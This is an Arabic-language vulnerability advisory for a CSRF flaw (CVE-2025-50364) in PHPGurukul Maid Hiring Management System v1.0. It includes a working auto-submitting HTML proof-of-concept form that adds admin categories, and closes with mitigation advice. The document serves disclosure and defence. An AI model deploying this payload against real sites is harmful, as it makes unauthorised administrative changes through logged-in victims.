
استغلال إثبات المفهوم لـ CSRF يستهدف CVE-2025-50364 في PHPGurukul Maid Hiring Management System v1.0 يضيف فئات مسؤول عشوائية عبر نموذج HTML مصمم.
اسم المشروع ورابط المستودع: نظام إدارة توظيف الخادمات باستخدام PHP وMySQL
نوع الثغرة: تزوير الطلب من جانب العميل
الإصدار (الإصدارات) المتأثرة: v1.0
💣وصف الثغرة: توجد ثغرة تزوير الطلب عبر المواقع (CSRF) في لوحة الإدارة لنظام PHPGurukul لإدارة التوظيف، مما يسمح للمهاجم بإضافة فئات توظيف عشوائية عن طريق خداع مسؤول موثوق لزيارة موقع ضار. قد يؤدي ذلك إلى تلوث البيانات وتغييرات غير مصرح بها على مستوى الإدارة.
👩💻التأثير: إنشاء فئات غير مصرح بها
🛜إثبات المفهوم (PoC)

/admin/add-category.php
CSRF-POC

<html>
<body>
<form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
<input type="hidden" name="catname" value="CSRF-POC" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


التوصية: تنفيذ رموز CSRF في نماذج الإدارة، وفرض ملفات تعريف الارتباط SameSite، والتحقق من مصدر الطلب لمنع الإجراءات غير المصرح بها.